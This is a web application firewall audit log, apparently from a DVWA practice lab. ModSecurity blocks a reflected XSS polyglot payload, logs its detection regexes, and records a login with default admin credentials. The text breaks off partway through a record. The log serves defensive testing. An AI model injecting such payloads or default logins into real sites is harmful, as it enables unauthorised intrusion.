{"transaction":{"time":"13/May/2017:09:35:52 --0400","transaction_id":"WRcLuH8AAQEAAAkYuEUAAAAD","remote_address":"127.0.0.1","remote_port":41796,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcLuH8AAQEAAAkYuEUAAAAD\"]"],"stopwatch":{"p1":753,"p2":1699,"p3":73,"p4":379,"p5":78,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:10 --0400","transaction_id":"WRcQen8AAQEAAAkZ0AsAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)([<\\xef\\xbc\\x9c]script[^>\\xef\\xbc\\x9e]*[>\\xef\\xbc\\x9e][\\\\s\\\\S]*?)\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\x22; alert(String.fromCharCode(88,83,83))//\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT> found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. 
Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: </SCRIPT found within ARGS:name: ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\\\\\\\\x22; alert(String.fromCharCode(88,83,83))//\\\\\\\\x22;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>\\\\\\\\x22>'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/ [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=15,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRcQen8AAQEAAAkZ0AsAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1250,"p2":4155,"p3":0,"p4":0,"p5":163,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkZ0AwAAAAE","remote_address":"192.168.75.130","remote_port":46192,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkZ0AwAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":549,"p2":2016,"p3":85,"p4":377,"p5":98,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4MAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRcQfn8AAQEAAAkVV4MAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":824,"p2":1965,"p3":92,"p4":176,"p5":93,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:14 --0400","transaction_id":"WRcQfn8AAQEAAAkVV4QAAAAA","remote_address":"192.168.75.130","remote_port":46194,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"698","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.130] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRcQfn8AAQEAAAkVV4QAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":886,"p2":2062,"p3":114,"p4":396,"p5":77,"sr":53,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:09:56:20 --0400","transaction_id":"WRcQhH8AAQEAAAmHBIwAAAAF","remote_address":"192.168.75.130","remote_port":46196,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1bfc05000ee7ba4f5d2937d1b34b27be"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 